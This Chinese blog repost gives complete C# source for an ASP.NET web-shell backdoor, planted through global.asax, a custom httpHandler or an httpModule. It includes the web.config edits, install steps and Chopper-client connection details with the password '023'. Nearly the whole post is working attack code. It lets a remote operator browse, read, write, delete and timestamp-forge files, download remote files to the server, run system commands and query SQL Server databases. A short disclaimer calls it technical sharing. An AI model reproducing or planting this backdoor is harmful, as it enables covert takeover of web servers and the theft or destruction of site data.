天天看點
傳回

ASP.NET global.asax、httpHandlers、httpModules 後門-園長

特别注意:需要特别小心配置任何一個誤操作都可能導緻網站徹底崩潰,對于新手操作危險系數很高。這裡隻是技術分享,請最好先在本地測試。如有發現BUG與我聯系

ASP.NET global.asax、httpHandlers、httpModules 後門-園長

一:global.asax

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324

<%@ Application Language=

"C#"

%>

<script RunAt=

'server'

>

void

Application_Start(

object

sender, EventArgs e)

{

//在應用程式啟動時運作的代碼

}

void

Application_End(

object

sender, EventArgs e)

{

//在應用程式關閉時運作的代碼

}

void

Application_Error(

object

sender, EventArgs e)

{

}

void

Session_Start(

object

sender, EventArgs e)

{

//在新會話啟動時運作的代碼

}

void

Session_End(

object

sender, EventArgs e)

{

//在會話結束時運作的代碼。

// 注意: 隻有在 Web.config 檔案中的 sessionstate 模式設定為

// InProc 時,才會引發 Session_End 事件。如果會話模式

//設定為 StateServer 或 SQLServer,則不會引發該事件。

}

void

CP(

string

S,

string

D)

{

if

(System.IO.Directory.Exists(S))

{

System.IO.DirectoryInfo m =

new

System.IO.DirectoryInfo(S);

System.IO.Directory.CreateDirectory(D);

foreach

(System.IO.FileInfo F

in

m.GetFiles())

{

System.IO.File.Copy(S +

"\\"

+ F.Name, D +

"\\"

+ F.Name);

}

foreach

(System.IO.DirectoryInfo F

in

m.GetDirectories())

{

CP(S +

"\\"

+ F.Name, D +

"\\"

+ F.Name);

}

}

else

{

System.IO.File.Copy(S, D);

}

}

void

EvalRequest(

string

action)

{

HttpContext context = HttpContext.Current;

HttpRequest request = context.Request;

HttpResponse response = context.Response;

string

Z = action;

if

(Z !=

""

)

{

string

Z1 = request.Form[

"Z1"

];

string

Z2 = request.Form[

"Z2"

];

string

R =

""

;

try

{

switch

(Z)

{

case

"A"

:

{

string

[] c = System.IO.Directory.GetLogicalDrives();

R =

string

.Format(

"{0}\t"

, context.Server.MapPath(

"~"

));

for

(

int

i = 0; i < c.Length; i++)

R += c[i][0] +

":"

;

break

;

}

case

"B"

:

{

System.IO.DirectoryInfo m =

new

System.IO.DirectoryInfo(Z1);

foreach

(System.IO.DirectoryInfo D

in

m.GetDirectories())

{

R +=

string

.Format(

"{0}/\t{1}\t0\t-\n"

, D.Name, System.IO.File.GetLastWriteTime(Z1 + D.Name).ToString(

"yyyy-MM-dd hh:mm:ss"

));

}

foreach

(System.IO.FileInfo D

in

m.GetFiles())

{

R +=

string

.Format(

"{0}\t{1}\t{2}\t-\n"

, D.Name, System.IO.File.GetLastWriteTime(Z1 + D.Name).ToString(

"yyyy-MM-dd hh:mm:ss"

), D.Length);

}

break

;

}

case

"C"

:

{

System.IO.StreamReader m =

new

System.IO.StreamReader(Z1, Encoding.Default);

R = m.ReadToEnd();

m.Close();

break

;

}

case

"D"

:

{

System.IO.StreamWriter m =

new

System.IO.StreamWriter(Z1,

false

, Encoding.Default);

m.Write(Z2);

R =

"1"

;

m.Close();

break

;

}

case

"E"

:

{

if

(System.IO.Directory.Exists(Z1))

System.IO.Directory.Delete(Z1,

true

);

else

System.IO.File.Delete(Z1);

R =

"1"

;

break

;

}

case

"F"

:

{

response.Clear();

response.Write(

"\x2D\x3E\x7C"

);

response.WriteFile(Z1);

response.Write(

"\x7C\x3C\x2D"

);

goto

End;

}

case

"G"

:

{

byte

[] B =

new

byte

[Z2.Length / 2];

for

(

int

i = 0; i < Z2.Length; i += 2)

{

B[i / 2] = (

byte

)Convert.ToInt32(Z2.Substring(i, 2), 16);

}

System.IO.FileStream fs =

new

System.IO.FileStream(Z1, System.IO.FileMode.Create);

fs.Write(B, 0, B.Length);

fs.Close();

R =

"1"

;

break

;

}

case

"H"

:

{

CP(Z1, Z2);

R =

"1"

;

break

;

}

case

"I"

:

{

if

(System.IO.Directory.Exists(Z1))

{

System.IO.Directory.Move(Z1, Z2);

}

else

{

System.IO.File.Move(Z1, Z2);

}

break

;

}

case

"J"

:

{

System.IO.Directory.CreateDirectory(Z1);

R =

"1"

;

break

;

}

case

"K"

:

{

DateTime TM = Convert.ToDateTime(Z2);

if

(System.IO.Directory.Exists(Z1))

{

System.IO.Directory.SetCreationTime(Z1, TM);

System.IO.Directory.SetLastWriteTime(Z1, TM);

System.IO.Directory.SetLastAccessTime(Z1, TM);

}

else

{

System.IO.File.SetCreationTime(Z1, TM);

System.IO.File.SetLastWriteTime(Z1, TM);

System.IO.File.SetLastAccessTime(Z1, TM);

}

R =

"1"

;

break

;

}

case

"L"

:

{

System.Net.HttpWebRequest RQ = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(

new

Uri(Z1));

RQ.Method =

"GET"

;

RQ.ContentType =

"application/x-www-form-urlencoded"

;

System.Net.HttpWebResponse WB = (System.Net.HttpWebResponse)RQ.GetResponse();

System.IO.Stream WF = WB.GetResponseStream();

System.IO.FileStream FS =

new

System.IO.FileStream(Z2, System.IO.FileMode.Create, System.IO.FileAccess.Write);

int

i;

byte

[] buffer =

new

byte

[1024];

while

(

true

)

{

i = WF.Read(buffer, 0, buffer.Length);

if

(i < 1)

break

; FS.Write(buffer, 0, i);

}

WF.Close();

WB.Close();

FS.Close();

R =

"1"

;

break

;

}

case

"M"

:

{

System.Diagnostics.ProcessStartInfo c =

new

System.Diagnostics.ProcessStartInfo(Z1.Substring(2));

System.Diagnostics.Process e =

new

System.Diagnostics.Process();

System.IO.StreamReader OT, ER;

c.UseShellExecute =

false

;

c.RedirectStandardOutput =

true

;

c.RedirectStandardError =

true

;

e.StartInfo = c;

c.Arguments =

string

.Format(

"{0} {1}"

, Z1.Substring(0, 2), Z2);

e.Start(); OT = e.StandardOutput;

ER = e.StandardError;

e.Close();

R = OT.ReadToEnd() + ER.ReadToEnd();

break

;

}

case

"N"

:

{

String strDat = Z1.ToUpper();

System.Data.SqlClient.SqlConnection Conn =

new

System.Data.SqlClient.SqlConnection(Z1);

Conn.Open();

R = Conn.Database +

"\t"

;

Conn.Close();

break

;

}

case

"O"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

);

String strConn = x[0], strDb = x[1];

System.Data.SqlClient.SqlConnection Conn =

new

System.Data.SqlClient.SqlConnection(strConn);

Conn.Open();

System.Data.DataTable dt = Conn.GetSchema(

"Columns"

);

Conn.Close();

for

(

int

i = 0; i < dt.Rows.Count; i++)

{

R += String.Format(

"{0}\t"

, dt.Rows[i][2].ToString());

}

break

;

}

case

"P"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

), p =

new

String[4];

String strConn = x[0], strDb = x[1], strTable = x[2]; p[0] = strDb;

p[2] = strTable;

System.Data.SqlClient.SqlConnection Conn =

new

System.Data.SqlClient.SqlConnection(strConn);

Conn.Open();

System.Data.DataTable dt = Conn.GetSchema(

"Columns"

, p);

Conn.Close();

for

(

int

i = 0; i < dt.Rows.Count; i++)

{

R += String.Format(

"{0} ({1})\t"

, dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());

}

break

;

}

case

"Q"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

);

String strDat, strConn = x[0], strDb = x[1];

int

i, c;

strDat = Z2.ToUpper();

System.Data.SqlClient.SqlConnection Conn =

new

System.Data.SqlClient.SqlConnection(strConn);

Conn.Open();

if

(strDat.IndexOf(

"SELECT "

) == 0 || strDat.IndexOf(

"EXEC "

) == 0 || strDat.IndexOf(

"DECLARE "

) == 0)

{

System.Data.SqlClient.SqlDataAdapter OD =

new

System.Data.SqlClient.SqlDataAdapter(Z2, Conn);

System.Data.DataSet ds =

new

System.Data.DataSet();

OD.Fill(ds);

if

(ds.Tables.Count > 0)

{

System.Data.DataRowCollection rows = ds.Tables[0].Rows;

for

(c = 0; c < ds.Tables[0].Columns.Count; c++)

{

R += String.Format(

"{0}\t|\t"

, ds.Tables[0].Columns[c].ColumnName.ToString());

}

R +=

"\r\n"

;

for

(i = 0; i < rows.Count; i++)

{

for

(c = 0; c < ds.Tables[0].Columns.Count; c++)

{

R += String.Format(

"{0}\t|\t"

, rows[i][c].ToString());

}

R +=

"\r\n"

;

}

}

ds.Clear();

ds.Dispose();

}

else

{

System.Data.SqlClient.SqlCommand cm = Conn.CreateCommand();

cm.CommandText = Z2;

cm.ExecuteNonQuery();

R =

"Result\t|\t\r\nExecute Successfully!\t|\t\r\n"

;

}

Conn.Close();

break

;

}

default

:

goto

End;

}

}

catch

(Exception E)

{

R =

"ERROR:// "

+ E.Message;

}

response.Write(

"\x2D\x3E\x7C"

+ R +

"\x7C\x3C\x2D"

);

End: ;

}

}

//在接收到一個應用程式請求時觸發。對于一個請求來說,它是第一個被觸發的事件,請求一般是使用者輸入的一個頁面請求(URL)。

void

Application_BeginRequest(

object

sender, EventArgs evt)

{

string

action = Request.Form[

"023"

];

if

(action !=

null

)

{

EvalRequest(action);

Response.End();

}

}

</script>

二、httpHandlers

修改web.config,添加或者修改httpHandlers:

?

1 2 3

<

httpHandlers

>

<

add

path

=

"*.api"

verb

=

"*"

type

=

"WooYun.CustomizeHttpHandler"

/>

</

httpHandlers

>

如果已經存在 httpHandlers 則在标簽内添加,如果<system.webServer>也有配置httpHandlers那麼就配置在<system.webServer>裡,但是有一點需要特别注意:<system.webServer>裡面一定要配置runAllManagedModulesForAllRequests為true,否會啟動報錯。

?

1 2 3

<

system.webServer

>

<

modules

runAllManagedModulesForAllRequests

=

"true"

/>

</

system.webServer

>

三:httpModules

相比修改httpHandlers顯然這種辦法更加的有效且安全一些。但是一定要把這個httpModule的順序配置到httpModules的第一個。修改web.config,添加或者修改httpHandlers:

?

1 2 3

<

httpModules

>

<

add

name

=

"WooYun"

type

=

"WooYun.CustomizeHttpModule"

/>

</

httpModules

>

Customize.cs代碼:

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332

using

System;

using

System.Data;

using

System.Configuration;

using

System.Web;

using

System.IO;

using

System.Text;

using

System.Net;

using

System.Diagnostics;

using

System.Data.SqlClient;

namespace

WooYun

{

public

class

Customize

{

public

static

void

CP(

string

S,

string

D)

{

if

(Directory.Exists(S))

{

DirectoryInfo m =

new

DirectoryInfo(S);

Directory.CreateDirectory(D);

foreach

(FileInfo F

in

m.GetFiles())

{

File.Copy(S +

"\\"

+ F.Name, D +

"\\"

+ F.Name);

}

foreach

(DirectoryInfo F

in

m.GetDirectories())

{

CP(S +

"\\"

+ F.Name, D +

"\\"

+ F.Name);

}

}

else

{

File.Copy(S, D);

}

}

public

static

void

Request()

{

HttpContext context = HttpContext.Current;

HttpRequest request = context.Request;

HttpResponse response = context.Response;

string

Z = request.Form[

"023"

];

if

(Z !=

""

)

{

string

Z1 = request.Form[

"Z1"

];

string

Z2 = request.Form[

"Z2"

];

string

R =

""

;

try

{

switch

(Z)

{

case

"A"

:

{

string

[] c = Directory.GetLogicalDrives();

R =

string

.Format(

"{0}\t"

, context.Server.MapPath(

"/"

));

for

(

int

i = 0; i < c.Length; i++)

R += c[i][0] +

":"

;

break

;

}

case

"B"

:

{

DirectoryInfo m =

new

DirectoryInfo(Z1);

foreach

(DirectoryInfo D

in

m.GetDirectories())

{

R +=

string

.Format(

"{0}/\t{1}\t0\t-\n"

, D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString(

"yyyy-MM-dd hh:mm:ss"

));

}

foreach

(FileInfo D

in

m.GetFiles())

{

R +=

string

.Format(

"{0}\t{1}\t{2}\t-\n"

, D.Name, File.GetLastWriteTime(Z1 + D.Name).ToString(

"yyyy-MM-dd hh:mm:ss"

), D.Length);

}

break

;

}

case

"C"

:

{

StreamReader m =

new

StreamReader(Z1, Encoding.Default);

R = m.ReadToEnd();

m.Close();

break

;

}

case

"D"

:

{

StreamWriter m =

new

StreamWriter(Z1,

false

, Encoding.Default);

m.Write(Z2);

R =

"1"

;

m.Close();

break

;

}

case

"E"

:

{

if

(Directory.Exists(Z1))

Directory.Delete(Z1,

true

);

else

File.Delete(Z1);

R =

"1"

;

break

;

}

case

"F"

:

{

response.Clear();

response.Write(

"\x2D\x3E\x7C"

);

response.WriteFile(Z1);

response.Write(

"\x7C\x3C\x2D"

);

goto

End;

}

case

"G"

:

{

byte

[] B =

new

byte

[Z2.Length / 2];

for

(

int

i = 0; i < Z2.Length; i += 2)

{

B[i / 2] = (

byte

)Convert.ToInt32(Z2.Substring(i, 2), 16);

}

FileStream fs =

new

FileStream(Z1, FileMode.Create);

fs.Write(B, 0, B.Length);

fs.Close();

R =

"1"

;

break

;

}

case

"H"

:

{

CP(Z1, Z2); R =

"1"

;

break

;

}

case

"I"

:

{

if

(Directory.Exists(Z1))

{

Directory.Move(Z1, Z2);

}

else

{

File.Move(Z1, Z2);

}

break

;

}

case

"J"

:

{

Directory.CreateDirectory(Z1);

R =

"1"

;

break

;

}

case

"K"

:

{

DateTime TM = Convert.ToDateTime(Z2);

if

(Directory.Exists(Z1))

{

Directory.SetCreationTime(Z1, TM);

Directory.SetLastWriteTime(Z1, TM);

Directory.SetLastAccessTime(Z1, TM);

}

else

{

File.SetCreationTime(Z1, TM);

File.SetLastWriteTime(Z1, TM);

File.SetLastAccessTime(Z1, TM);

}

R =

"1"

;

break

;

}

case

"L"

:

{

HttpWebRequest RQ = (HttpWebRequest)WebRequest.Create(

new

Uri(Z1));

RQ.Method =

"GET"

;

RQ.ContentType =

"application/x-www-form-urlencoded"

;

HttpWebResponse WB = (HttpWebResponse)RQ.GetResponse();

Stream WF = WB.GetResponseStream();

FileStream FS =

new

FileStream(Z2, FileMode.Create, FileAccess.Write);

int

i;

byte

[] buffer =

new

byte

[1024];

while

(

true

)

{

i = WF.Read(buffer, 0, buffer.Length);

if

(i < 1)

break

; FS.Write(buffer, 0, i);

}

WF.Close();

WB.Close();

FS.Close();

R =

"1"

;

break

;

}

case

"M"

:

{

System.Diagnostics.ProcessStartInfo c =

new

System.Diagnostics.ProcessStartInfo(Z1.Substring(2));

System.Diagnostics.Process e =

new

System.Diagnostics.Process();

System.IO.StreamReader OT, ER;

c.UseShellExecute =

false

;

c.RedirectStandardOutput =

true

;

c.RedirectStandardError =

true

;

e.StartInfo = c;

c.Arguments =

string

.Format(

"{0} {1}"

, Z1.Substring(0, 2), Z2);

e.Start();

OT = e.StandardOutput;

ER = e.StandardError;

e.Close();

R = OT.ReadToEnd() + ER.ReadToEnd();

break

;

}

case

"N"

:

{

String strDat = Z1.ToUpper();

SqlConnection Conn =

new

SqlConnection(Z1);

Conn.Open();

R = Conn.Database +

"\t"

;

Conn.Close();

break

;

}

case

"O"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

);

String strConn = x[0], strDb = x[1];

SqlConnection Conn =

new

SqlConnection(strConn);

Conn.Open();

DataTable dt = Conn.GetSchema(

"Columns"

);

Conn.Close();

for

(

int

i = 0; i < dt.Rows.Count; i++)

{

R += String.Format(

"{0}\t"

, dt.Rows[i][2].ToString());

}

break

;

}

case

"P"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

), p =

new

String[4];

String strConn = x[0], strDb = x[1], strTable = x[2];

p[0] = strDb;

p[2] = strTable;

SqlConnection Conn =

new

SqlConnection(strConn);

Conn.Open();

DataTable dt = Conn.GetSchema(

"Columns"

, p);

Conn.Close();

for

(

int

i = 0; i < dt.Rows.Count; i++)

{

R += String.Format(

"{0} ({1})\t"

, dt.Rows[i][3].ToString(), dt.Rows[i][7].ToString());

}

break

;

}

case

"Q"

:

{

String[] x = Z1.Replace(

"\r"

,

""

).Split(

'\n'

);

String strDat, strConn = x[0], strDb = x[1];

int

i, c;

strDat = Z2.ToUpper();

SqlConnection Conn =

new

SqlConnection(strConn);

Conn.Open();

if

(strDat.IndexOf(

"SELECT "

) == 0 || strDat.IndexOf(

"EXEC "

) == 0 || strDat.IndexOf(

"DECLARE "

) == 0)

{

SqlDataAdapter OD =

new

SqlDataAdapter(Z2, Conn);

DataSet ds =

new

DataSet(); OD.Fill(ds);

if

(ds.Tables.Count > 0)

{

DataRowCollection rows = ds.Tables[0].Rows;

for

(c = 0; c < ds.Tables[0].Columns.Count; c++)

{

R += String.Format(

"{0}\t|\t"

, ds.Tables[0].Columns[c].ColumnName.ToString());

}

R +=

"\r\n"

;

for

(i = 0; i < rows.Count; i++)

{

for

(c = 0; c < ds.Tables[0].Columns.Count; c++)

{

R += String.Format(

"{0}\t|\t"

, rows[i][c].ToString());

}

R +=

"\r\n"

;

}

}

ds.Clear();

ds.Dispose();

}

else

{

SqlCommand cm = Conn.CreateCommand();

cm.CommandText = Z2;

cm.ExecuteNonQuery();

R =

"Result\t|\t\r\nExecute Successfully!\t|\t\r\n"

;

}

Conn.Close();

break

;

}

default

:

goto

End;

}

}

catch

(Exception E)

{

R =

"ERROR:// "

+ E.Message;

}

response.Write(

"\x2D\x3E\x7C"

+ R +

"\x7C\x3C\x2D"

);

End: ;

}

response.End();

}

}

public

class

CustomizeHttpHandler : IHttpHandler

{

public

bool

IsReusable

{

get

{

return

true

;

}

}

public

void

ProcessRequest(HttpContext context)

{

Customize.Request();

}

}

public

class

CustomizeHttpModule : IHttpModule

{

#region IHttpModule 成員

public

void

Dispose()

{

}

public

void

Init(HttpApplication context)

{

context.BeginRequest +=

new

EventHandler(context_BeginRequest);

}

void

context_BeginRequest(

object

sender, EventArgs e)

{

Customize.Request();

}

#endregion

}

}

四:安裝方法

global.asax是不需要編譯的,是以直接忽略。

httpHandlers和httpModules配置方式:

1、自行編譯上面的cs檔案dll

2、複制dll到bin目錄

3、修改上述配置,并仔細檢查

或:

1、直接建立個Customize.cs檔案

2、複制Customize.cs檔案到App_Code目錄

3、修改上述配置,并仔細檢查

連接配接:

1、菜刀連接配接的時候必須選Customize:

2、httpHandlers 可以自己指定字尾,比如你配置了.api請求那麼可以http://xx.com/123456.api做為shell位址,可能會有不能攔截除aspx的情況

3、httpModules可以随便通路一個隻要不是靜态檔案的連結(比如jpg檔案不允許被POST) 可以通路:http://xx.com/123456.xxx

4、連接配接密碼:023

ASP/ASP.NET
上一篇: 一個較完整的關鍵字過濾解決方案(上)
下一篇: mysql經典sql語句大全_MySql常用操作SQL語句彙總

繼續閱讀